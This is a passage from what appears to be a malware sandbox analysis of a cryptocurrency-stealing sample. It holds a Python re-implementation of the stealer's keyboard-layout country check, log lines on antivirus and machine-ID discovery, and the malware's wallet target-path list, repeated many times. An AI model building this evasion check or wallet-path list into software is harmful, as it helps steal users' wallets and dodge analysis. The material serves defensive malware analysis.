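# ASSUMPTION: the report does not say which languages this build refuses to run on.
# This set only illustrates the mechanism.
ASSUMED_EXCLUDED_PRIMARY_LANGS: Set[int] = {LANG_RUSSIAN, LANG_UKRAINIAN, LANG_BELARUSIAN, LANG_KAZAKH}

# A few well-known LANGIDs for readable output.
KNOWN_LANGIDS = {0x0409: "en-US", 0x0407: "de-DE", 0x0419: "ru-RU",
                 0x0422: "uk-UA", 0x0423: "be-BY", 0x043F: "kk-KZ"}


def hkl_to_langid(hkl: int) -> int:
    return hkl & 0xFFFF


def primary_lang(langid: int) -> int:
    return langid & 0x3FF


def sub_lang(langid: int) -> int:
    return (langid >> 10) & 0x3F


def describe(hkl: int) -> str:
    lid = hkl_to_langid(hkl)
    return "HKL 0x%08X -> LANGID 0x%04X (%s), primary 0x%02X sub 0x%02X" % (
        hkl, lid, KNOWN_LANGIDS.get(lid, "?"), primary_lang(lid), sub_lang(lid))


def layouts_trip_country_check(hkls: Iterable[int],
                               excluded: Set[int] = ASSUMED_EXCLUDED_PRIMARY_LANGS) -> bool:
    """True if any installed layout's primary language is on the exclusion list.

    Note that the check looks at every installed layout, not the active one: a machine
    with en-US active and ru-RU merely installed still trips it.
    """
    return any(primary_lang(hkl_to_langid(h)) in excluded for h in hkls)


def installed_layouts() -> List[int]:
    """Live HKL list via user32 (Windows only); elsewhere returns [] so callers can fall back."""
    if sys.platform != "win32":
        return []
    import ctypes
    from ctypes import wintypes
    user32 = ctypes.WinDLL("user32", use_last_error=True)
    user32.GetKeyboardLayoutList.argtypes = [ctypes.c_int, ctypes.POINTER(wintypes.HKL)]
    user32.GetKeyboardLayoutList.restype = ctypes.c_int
    n = user32.GetKeyboardLayoutList(0, None)       # first call: how many layouts
    buf = (wintypes.HKL * n)()
    n = user32.GetKeyboardLayoutList(n, buf)        # second call: fill the buffer
    return [int(buf[i] or 0) & 0xFFFFFFFF for i in range(n)]


if __name__ == "__main__":
    # Constructed sample: en-US plus ru-RU installed, as on many analyst VMs.
    sample = installed_layouts() or [0x04090409, 0x04190419]
    for h in sample:
        print(describe(h))
    print("would bail out:", layouts_trip_country_check(sample))
```

The practical use is the inverse of the malware's: if a sandbox image lists only en-US layouts the check passes and the stealer proceeds, while adding a single excluded layout makes the sample exit before it touches any wallet or browser data, which is what "crashes after keyboard check" looks like from the outside.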
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B76AF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_005B76AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA, 1_2_00410C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 1_2_00410D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s Defender\MsMpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7032, type: MEMORYSTR
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local 